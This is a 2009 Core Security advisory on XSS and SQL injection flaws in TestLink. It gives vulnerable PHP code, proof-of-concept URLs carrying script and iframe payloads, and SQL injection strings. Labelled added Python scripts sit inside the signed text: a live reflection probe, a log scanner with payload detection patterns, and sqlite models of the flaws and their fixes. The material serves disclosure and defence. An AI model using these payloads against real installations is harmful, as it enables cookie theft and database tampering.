Core Security Technologies Advisory 2009.1013
Source: packetstormsecurity.com (PACKETSTORM:83692), Core Security Technologies
Published: 2009-12-10
EPSS: 0.002 (Low), percentile 55.1%

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Core Security Technologies - CoreLabs  
Advisory  
  
http://www.coresecurity.com/corelabs/  
  
Multiple XSS and Injection Vulnerabilities in TestLink Test Management  
and Execution System  
  
  
1. *Advisory Information*  
  
Title: Multiple XSS and Injection Vulnerabilities in TestLink Test  
Management and Execution System  
Advisory Id: CORE-2009-1013  
Advisory URL:  
http://www.coresecurity.com/content/testlink-multiple-injection-vulnerabilities  
Date published: 2009-12-09  
Date of last update: 2009-12-09  
Vendors contacted: TestLink Community  
Release mode: Coordinated release  
  
  
2. *Vulnerability Information*  
  
Class: Cross site scripting [CWE-79], SQL injection [CWE-89]  
Impact: Code execution  
Remotely Exploitable: Yes  
Locally Exploitable: No  
Bugtraq ID: 37258  
CVE Name: CVE-2009-4237, CVE-2009-4238  
  
  
3. *Vulnerability Description*  
  
Multiple injection (both XSS [1] and SQL) vulnerabilities have been  
discovered in Testlink [2], a widely used test-case management  
application written in PHP [3]. One of the XSS vulnerabilities,  
discovered in its login screen, can be exploited without an  
authenticated session.  
  
  
4. *Vulnerable packages*  
  
. TestLink 1.8.0  
. TestLink 1.8.1  
. TestLink 1.8.2  
. TestLink 1.8.3  
. TestLink 1.8.4  
. Older versions are probably affected too, but they were not checked.  
  
  
5. *Non-vulnerable packages*  
  
. TestLink 1.8.5  
  
  
6. *Solutions and Workarounds*  
  
Upgrade to a non-vulnerable version, such as 1.8.5. TestLink features  
the option to upgrade a current installation in its install scripts.  
  
  
7. *Credits*  
  
These vulnerabilities were discovered and researched by Pablo  
Annetta, from Core Security Technologies, during Core Bugweek 2009 as  
a member of the "Los Herederos de Don Pablo (HDP)" team.  
  
  
8. *Technical Description / Proof of Concept Code*  
  
Most of these vulnerabilities exist because the sanitization of user  
input in the TestLink code is rudimentary: each script sanitizes its  
own input instead of delegating the task to a shared layer. Often only  
slashes are stripped, and HTML entities are almost never escaped.  
  
The only vulnerability in this report that can be exploited without  
an authenticated session is an XSS vulnerability in TestLink's login  
page 'login.php'. The script reads a parameter named 'req', which the  
application uses to set the next request to be made after login. All  
parameters are initialized in the 'init_args' function, which only  
strips slashes from the request and never escapes HTML entities, as  
seen below.  
  
/-----  
function init_args()  
{  
    $args = new stdClass();  
    // The only "sanitization": strip slashes from every request value.  
    // Nothing here escapes HTML entities, so 'req' reaches the page as typed.  
    $_REQUEST = strings_stripSlashes($_REQUEST);  
  
    $args->note = isset($_REQUEST['note']) ? $_REQUEST['note'] : null;  
    $args->login = isset($_REQUEST['tl_login']) ?  
                   trim($_REQUEST['tl_login']) : null;  
    $args->pwd = isset($_REQUEST['tl_password']) ?  
                 $_REQUEST['tl_password'] : null;  
  
    // 'req' is later emitted into the login form unescaped (the XSS sink).  
    $args->reqURI = isset($_REQUEST['req']) ? $_REQUEST['req'] : null;  
    $args->preqURI = (isset($_REQUEST['reqURI']) &&  
                      strlen($_REQUEST['reqURI'])) ? $_REQUEST['reqURI'] : null;  
  
    return $args;  
}  
-----/  
  
This vulnerability can be verified by issuing the following request  
to a Testlink installation on localhost:  
  
/-----  
http://127.0.0.1/testlink/login.php?req="><iframe src  
="http://www.coresecurity.com/content/xxxx" width="100%"  
height="300"></iframe>  
-----/  
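The following Python script is an added example, not code from the Core advisory or from TestLink. It automates the check the PoC above performs by hand: send the payload in 'req' and decide whether it comes back raw (exploitable), altered (entity-encoded or stripped) or not at all. `render_login_form` is a constructed model of the login form's hidden 'req' field, not TestLink's template; `probe` assumes a lab base URL passed on the command line; and the frame is pointed at the reserved name example.invalid rather than the advisory's placeholder URL.

```python
"""Reflection probe for the login.php 'req' parameter (added example, not TestLink code)."""
import html
import sys
import urllib.parse
import urllib.request

# The advisory's PoC payload, with the frame pointed at a reserved test name.
PAYLOAD = '"><iframe src="http://example.invalid/" width="100%" height="300"></iframe>'
# A substring of PAYLOAD that will not occur in a normal page; used to tell
# "reflected but neutralised" from "not reflected at all".
MARKER = "example.invalid"


def classify_reflection(body: str, payload: str, marker: str) -> str:
    """How does PAYLOAD come back in BODY?

    'raw'     - byte-for-byte: the attribute is broken out of and the frame renders
    'altered' - the marker is present but the metacharacters were changed
                (entity-encoded or stripped), so the payload does not execute
    'absent'  - the parameter is not reflected into this page at all
    """
    if payload in body:
        return "raw"
    if marker in body:
        return "altered"
    return "absent"


def render_login_form(req: str, safe: bool) -> str:
    """Model of the login form's hidden 'req' field (constructed markup, not
    TestLink's template). safe=False reproduces the advisory's sink: the value
    is emitted as received after stripslashes. safe=True applies the
    htmlspecialchars()-style encoding the advisory recommends."""
    value = html.escape(req, quote=True) if safe else req
    return ('<form method="post" action="login.php">'
            f'<input type="hidden" name="req" value="{value}">'
            '</form>')


def probe(base_url: str, path: str, param: str, payload: str, marker: str,
          timeout: float = 10.0) -> str:
    """GET base_url/path?param=payload and classify the reflection.
    Only run this against an instance you are authorised to test."""
    query = urllib.parse.urlencode({param: payload})
    url = f"{base_url.rstrip('/')}/{path.lstrip('/')}?{query}"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        body = resp.read().decode(charset, errors="replace")
    return classify_reflection(body, payload, marker)


if __name__ == "__main__":
    # Offline demonstration against the modelled sink, then an optional live probe.
    for safe in (False, True):
        verdict = classify_reflection(render_login_form(PAYLOAD, safe), PAYLOAD, MARKER)
        print(f"safe={safe}: {verdict}")
    if len(sys.argv) > 1:  # e.g. python probe.py http://127.0.0.1/testlink
        print("login.php req:", probe(sys.argv[1], "login.php", "req", PAYLOAD, MARKER))
```

Against an affected version the live probe should report 'raw'. With the `safe=True` branch the marker survives but the quote and angle brackets do not, which is the 'altered' verdict; a fix that drops the value entirely would instead report 'absent', so both non-'raw' verdicts mean the PoC no longer works.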
  
  
Other XSS vulnerabilities on different scripts can be exploited with  
an authenticated session. Proof of concept code follows:  
  
/-----  
http://127.0.0.1/testlink/lib/general/staticPage.php?key="><script>alert(document.cookie)</script>  
  
http://127.0.0.1/testlink/lib/attachments/attachmentupload.php?id=1&tableName='<script>alert(document.cookie)</script>  
http://127.0.0.1/testlink/lib/events/eventviewer.php?startDate="<script>alert(document.cookie)</script>  
http://127.0.0.1/testlink/lib/events/eventviewer.php?endDate="<script>alert(document.cookie)</script>  
http://127.0.0.1/testlink/lib/events/eventviewer.php?logLevel="<script>alert(document.cookie)</script>  
-----/  
  
  
There are more XSS attacks that can be executed with *an  
authenticated session* on installations that have *at least one test  
plan created*. Most of these are due to an 'echo' statement in  
TestLink's database functions that outputs SQL errors, built from the  
failed query, directly back to the browser without escaping HTML  
entities. Because the failed query embeds the user's own input, any  
markup placed in a search parameter is echoed verbatim once another  
parameter breaks the query. This can be found on line 181 of  
'testlink/lib/functions/database.class.php', where a function such as  
'htmlspecialchars' should be applied to both '$this->error($p_query)'  
and '$message' before output. A templating engine (TestLink already  
uses Smarty for many other tasks) could also be used to render these  
errors.  
  
/-----  
if ( !$t_result ) {  
    // Both strings reach the browser unescaped; $p_query contains user input.  
    echo "ERROR ON exec_query() - database.class.php <br>" .  
         $this->error($p_query) . "<br>";  
    echo "<br> THE MESSAGE :: $message. <br>";  
    return false;  
} else {  
    return $t_result;  
}  
-----/  
  
This proof of concept code triggers the vulnerabilities described above:  
  
/-----  
http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&expected_results='<script>alert(document.cookie)</script>  
http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&name=<script>alert(document.cookie)</script>  
http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='&steps=<script>alert(document.cookie)</script>  
http://127.0.0.1//testlink/lib/testcases/searchData.php?doSearch=find&summary='<script>alert(document.cookie)</script>  
-----/  
  
Further XSS can be triggered on 'resultsMoreBuilds_buildReport.php'.  
Part of it comes from the unescaped SQL error output described above,  
but the script also has an independent XSS of its own, because it does  
not escape the 'search_notes_string' parameter. The following request  
triggers it (again when logged into an installation with at least one  
test plan created):  
  
/-----  
http://127.0.0.1/testlink/lib/results/resultsMoreBuilds_buildReport.php?report_type=0&display_query_params=1&search_notes_string=</td><script>alert(document.cookie)</script>  
-----/  
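For teams that need to find these requests after the fact, the following Python script is an added example (not from the advisory) that scans web-server access logs in combined format for the payload shapes used in the PoCs above: injected markup, a UNION SELECT, or a leading quote aimed at the SQL error echo. The log lines are constructed to mirror three of the advisory's requests plus one benign login; the script name list is taken from the PoCs and is an assumption about which paths are worth matching.

```python
"""Access-log detection for the request patterns in this advisory (added example)."""
import re
import urllib.parse

# Combined log format (Apache/nginx default); only the request line is used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Scripts named in the PoCs above; matching is restricted to these to limit noise.
TESTLINK_SCRIPTS = ("login.php", "staticPage.php", "attachmentupload.php", "eventviewer.php",
                    "searchData.php", "resultsMoreBuilds_buildReport.php", "navBar.php")
UNION_RE = re.compile(r"\bunion\s+select\b")


def suspicious_params(target: str) -> list:
    """Return (parameter, reason) pairs whose URL-decoded value matches one of the
    advisory's payload shapes: injected markup, a UNION SELECT, or a leading quote
    used to break the query and reach the error echo."""
    parsed = urllib.parse.urlsplit(target)
    if not parsed.path.endswith(TESTLINK_SCRIPTS):
        return []
    findings = []
    for name, value in urllib.parse.parse_qsl(parsed.query, keep_blank_values=True):
        low = value.lower()
        if "<script" in low or "<iframe" in low or "</td>" in low:
            findings.append((name, "html markup"))
        elif UNION_RE.search(low):
            findings.append((name, "sql union"))
        elif value.startswith("'"):
            findings.append((name, "leading quote"))
    return findings


def scan(lines) -> list:
    """Return (ip, status, path, findings) for every log line that carries a payload."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        found = suspicious_params(m["target"])
        if found:
            path = urllib.parse.urlsplit(m["target"]).path
            hits.append((m["ip"], int(m["status"]), path, found))
    return hits


# Constructed log lines reproducing three PoC requests plus one benign login redirect.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2009:10:01:02 +0000] "GET /testlink/login.php?req=%22%3E%3Ciframe%20src%3D%22http://example.invalid/%22%3E%3C/iframe%3E HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Dec/2009:10:01:09 +0000] "GET /testlink/lib/events/eventviewer.php?logLevel=1,1)%20union%20SELECT%20id%20FROM%20testplans%20%23 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Dec/2009:10:01:15 +0000] "GET /testlink/lib/testcases/searchData.php?doSearch=find&summary=%27&expected_results=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 980 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2009:10:02:00 +0000] "GET /testlink/login.php?req=lib/general/mainPage.php HTTP/1.1" 200 1500 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, path, found in scan(SAMPLE_LOG):
        print(ip, status, path, found)
```

The three payload classes are deliberately coarse: a 200 response to a 'leading quote' probe on searchData.php followed by an 'html markup' hit from the same address is the sequence an attacker working through this advisory would produce, and it is the correlation, not any single line, that is worth alerting on.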
  
  
With an authenticated session, the following SQL injection bug can  
also be exploited.  
  
In 'http://127.0.0.1/testlink/lib/general/navBar.php', enter the  
value below in the 'Test Case ID' field. The input reaches the query  
unescaped, and the injected markup comes back as reflected HTML:  
  
/-----  
TC-1 or 1 = 1 update tcversions set summary = '</td><script>alert(document.cookie)</script><td>'  
-----/  
  
Also with an authenticated session, the following blind SQL injection  
exists in the 'logLevel' parameter of the event viewer:  
  
/-----  
http://127.0.0.1/testlink/lib/events/eventviewer.php?logLevel=1,1)%20union%20SELECT%20id%20FROM%20testplans%20%23  
-----/  
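To make the two database-side mechanisms concrete, the following Python program is an added example (not Core's or TestLink's code) that rebuilds both sinks on an in-memory sqlite database. The page does not show the vulnerable queries, so the query shapes (a LIKE search for searchData.php and an IN (...) list for the event viewer's 'logLevel') are assumptions chosen to be consistent with the PoCs; the tables and rows are constructed; and because sqlite does not treat '#' as a comment, the event-viewer payload is run with MySQL's '#' swapped for '--'. The model returns the UNION rows directly so that the effect is visible; in TestLink the injection is blind, as stated above.

```python
"""sqlite3 models of the two SQL sinks in this advisory (added example, not TestLink code)."""
import html
import re
import sqlite3

# The advisory's eventviewer.php PoC, URL-decoded. '#' is MySQL's line comment;
# the sqlite model below swaps it for '--', which plays the same role there.
EVENT_PAYLOAD = "1,1) union SELECT id FROM testplans #"
XSS = "<script>alert(document.cookie)</script>"


def make_db() -> sqlite3.Connection:
    """Constructed schema and rows; TestLink's real tables are richer than this."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE tcversions (id INTEGER PRIMARY KEY, summary TEXT, expected_results TEXT);
        CREATE TABLE events     (id INTEGER PRIMARY KEY, log_level INTEGER, message TEXT);
        CREATE TABLE testplans  (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO tcversions VALUES (1, 'login works', 'user is logged in');
        INSERT INTO events VALUES (1, 1, 'startup'), (2, 4, 'query failed');
        INSERT INTO testplans VALUES (42, 'release-1.8');
    """)
    return db


def search_vulnerable(db: sqlite3.Connection, summary: str, expected_results: str) -> str:
    """searchData.php-style search, assumed query shape: input is concatenated into
    SQL, and on failure the query text is echoed back unescaped, as the
    database.class.php snippet above does. A lone quote in 'summary' breaks the
    syntax, so whatever was placed in 'expected_results' is reflected."""
    query = ("SELECT id FROM tcversions WHERE summary LIKE '%" + summary + "%' "
             "AND expected_results LIKE '%" + expected_results + "%'")
    try:
        rows = db.execute(query).fetchall()
        return "<ul>" + "".join(f"<li>{r[0]}</li>" for r in rows) + "</ul>"
    except sqlite3.Error as exc:
        # Mirrors: echo "ERROR ON exec_query() ..." . $this->error($p_query) . "<br>";
        return f"ERROR ON exec_query() <br>{query} :: {exc}<br>"


def search_fixed(db: sqlite3.Connection, summary: str, expected_results: str) -> str:
    """Bound parameters remove the injection; the error branch escapes what it echoes."""
    query = "SELECT id FROM tcversions WHERE summary LIKE ? AND expected_results LIKE ?"
    try:
        rows = db.execute(query, (f"%{summary}%", f"%{expected_results}%")).fetchall()
        return "<ul>" + "".join(f"<li>{r[0]}</li>" for r in rows) + "</ul>"
    except sqlite3.Error as exc:
        return "ERROR ON exec_query() <br>" + html.escape(f"{query} :: {exc}", quote=True) + "<br>"


def events_vulnerable(db: sqlite3.Connection, log_level: str) -> list:
    """eventviewer.php-style filter, assumed shape: logLevel dropped into IN (...).
    The PoC closes the list, appends a UNION and comments out the rest."""
    query = f"SELECT id FROM events WHERE log_level IN ({log_level}) ORDER BY id"
    return [r[0] for r in db.execute(query).fetchall()]


def events_fixed(db: sqlite3.Connection, log_level: str) -> list:
    """Accept only a comma-separated list of integers and bind each one."""
    if not re.fullmatch(r"\d+(,\d+)*", log_level):
        raise ValueError("logLevel must be a comma-separated list of integers")
    levels = [int(v) for v in log_level.split(",")]
    marks = ",".join("?" * len(levels))
    query = f"SELECT id FROM events WHERE log_level IN ({marks}) ORDER BY id"
    return [r[0] for r in db.execute(query, levels).fetchall()]


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "'", XSS))          # query text with <script> echoed raw
    print(search_fixed(db, "'", XSS))               # empty result list, nothing echoed
    print(events_vulnerable(db, EVENT_PAYLOAD.replace("#", "--")))  # leaks testplans.id 42
    try:
        events_fixed(db, EVENT_PAYLOAD)
    except ValueError as err:
        print("fixed:", err)
```

Two points the model makes visible: escaping the echoed error is only defense in depth, since with bound parameters the attacker can no longer make the query fail on demand; and for an IN (...) list the correct fix is a type check plus one placeholder per value, because no amount of quoting turns an attacker-supplied list into a safe SQL fragment.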
  
  
9. *Report Timeline*  
  
. 2009-10-29:  
Core Security Technologies notifies Toshiyuki Kawanishi (at his  
@users.sourceforge.jp address) from the Teamst team of the  
vulnerabilities, offering a draft for this advisory in plaintext or  
encrypted form (if proper keys are sent). November 9th, 2009, is  
proposed as a release date.  
  
. 2009-11-02:  
Because no response was obtained from Toshiyuki at his  
@users.sourceforge.jp address, Core Security Technologies tries to  
contact him using the "Contact" webform at http://www.teamst.org.  
  
. 2009-11-09:  
Since there is still no reply from Toshiyuki, Core now tries  
contacting Francisco Mancardi. November 23rd is now proposed as a  
release date.  
  
. 2009-11-09:  
Francisco Mancardi replies asking that a copy in plaintext of the  
advisory be sent to him, and also to Toshiyuki Kawanishi and Martin  
Havlat.  
  
. 2009-11-09:  
Core sends a draft for this advisory, including the technical  
description of the vulnerabilities, to Francisco Mancardi, Toshiyuki  
Kawanishi and Martin Havlat.  
  
. 2009-11-10:  
Martin Havlat replies acknowledging reception of the advisory draft,  
and tells Core that internal issue #2947 has been created in their bug  
tracking system to fix these bugs. He mentions these issues shall be  
fixed on release 1.8.5 of TestLink.  
  
. 2009-11-12:  
Core replies asking for more information regarding the release date of  
TestLink 1.8.5. An account is created by Core in TestLink's internal  
bug tracking system to access information about issue #2947.  
  
. 2009-11-17:  
Core requests again information regarding the release date of TestLink  
1.8.5 in order to schedule the release of this advisory accordingly,  
since no reply on this has been yet given by the TestLink developers  
contacted. Core also mentions that issue #2947 cannot be accessed by  
the user created in order to follow the development of a patch for the  
vulnerabilities reported here.  
  
. 2009-11-17:  
Francisco Mancardi replies specifying that "maybe [issue #2947] has  
private status".  
  
. 2009-11-20:  
Core asks once more for a release date for a fixed version of  
TestLink. The advisory is rescheduled for release on Monday, November  
30th, since there is no information on whether the TestLink team can  
meet the Monday, November 23rd deadline. Core also mentions that they  
are eager to passively monitor the progress of the TestLink developers  
in fixing these issues if access to issue #2947 is given to the  
account they created on TestLink's bug tracking system.  
  
. 2009-11-26:  
Since there was no reply to their last e-mail, Core resends it,  
reminding the developers that their planned release date for the  
advisory is Monday 30th, and that they would like to know if there is  
a planned release date for a fixed version of TestLink. Core reminds  
the developers about their commitment in helping them in correctly  
fixing the bug, should they get access to private issue #2947.  
  
. 2009-11-27:  
Martin Havlat replies that due to priorities in the internal  
development group of Testlink the bug has not yet been fixed. He  
commits to release TestLink 1.8.5 as soon as this bug is fixed, but  
besides stating that he wished to have time to fix this himself, no  
firm or verifiable claim is made that can assure Core of a planned fix  
and release.  
  
. 2009-11-27:  
Core reschedules its internal publication date for this advisory to  
December 14th. This will be the final date and a user-release will be  
made, unless TestLink developers share information that can be  
verified by Core that shows commitment to eventually looking into said  
bugs and fixing them. Core suggests that developers actually in charge  
of these issues are copied in the e-mail loop, or that access to  
internal issue-tracking tools be given to them to actively participate  
in the discussions and the patching process.  
  
. 2009-11-30:  
Martin Havlat asks for technical details needed by him to confirm some  
of these vulnerabilities.  
  
. 2009-12-01:  
Core replies with the technical details needed by Martin Havlat.  
  
. 2009-12-02:  
Martin Havlat sends a patched version of TestLink to Core asking for  
verification of fixes to some of the vulnerabilities reported in this  
advisory.  
  
. 2009-12-03:  
Core replies saying that the fixes proposed by Martin Havlat fail to  
patch those specific vulnerabilities. The bugs are further researched  
by Core and the advisory draft is modified to include a more detailed  
explanation of these bugs. This technical information is shared by  
Core with Martin Havlat and some insight into possible fixes is also  
given.  
  
. 2009-12-09:  
TestLink 1.8.5 is released.  
  
. 2009-12-09:  
Advisory CORE-2009-1013 is published.  
  
  
10. *References*  
  
[1] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  
[2] http://www.teamst.org/  
[3] http://www.owasp.org/index.php/PHP_Top_5  
  
  
11. *About CoreLabs*  
  
CoreLabs, the research center of Core Security Technologies, is  
charged with anticipating the future needs and requirements for  
information security technologies. We conduct our research in several  
important areas of computer security including system vulnerabilities,  
cyber attack planning and simulation, source code auditing, and  
cryptography. Our results include problem formalization,  
identification of vulnerabilities, novel solutions and prototypes for  
new technologies. CoreLabs regularly publishes security advisories,  
technical papers, project information and shared software tools for  
public use at: http://www.coresecurity.com/corelabs.  
  
  
12. *About Core Security Technologies*  
  
Core Security Technologies develops strategic solutions that help  
security-conscious organizations worldwide develop and maintain a  
proactive process for securing their networks. The company's flagship  
product, CORE IMPACT, is the most comprehensive product for performing  
enterprise security assurance testing. CORE IMPACT evaluates network,  
endpoint and end-user vulnerabilities and identifies what resources  
are exposed. It enables organizations to determine if current security  
investments are detecting and preventing attacks. Core Security  
Technologies augments its leading technology solution with world-class  
security consulting services, including penetration testing and  
software security auditing. Based in Boston, MA and Buenos Aires,  
Argentina, Core Security Technologies can be reached at 617-399-6980  
or on the Web at http://www.coresecurity.com.  
  
  
13. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2009 Core Security  
Technologies and (c) 2009 CoreLabs, and may be distributed freely  
provided that no fee is charged for this distribution and proper  
credit is given.  
  
  
14. *PGP/GPG Keys*  
  
This advisory has been signed with the GPG key of Core Security  
Technologies advisories team, which is available for download at  
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32)  
Comment: GnuPT v3.6.3  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  
  
iEYEARECAAYFAksgL9IACgkQyNibggitWa3csgCfdV5dyeDFf1r+/yNIO6PpDgvk  
LJgAoKTesYDuoe6SpJzMhPKujbi1Z0vV  
=H22d  
-----END PGP SIGNATURE-----  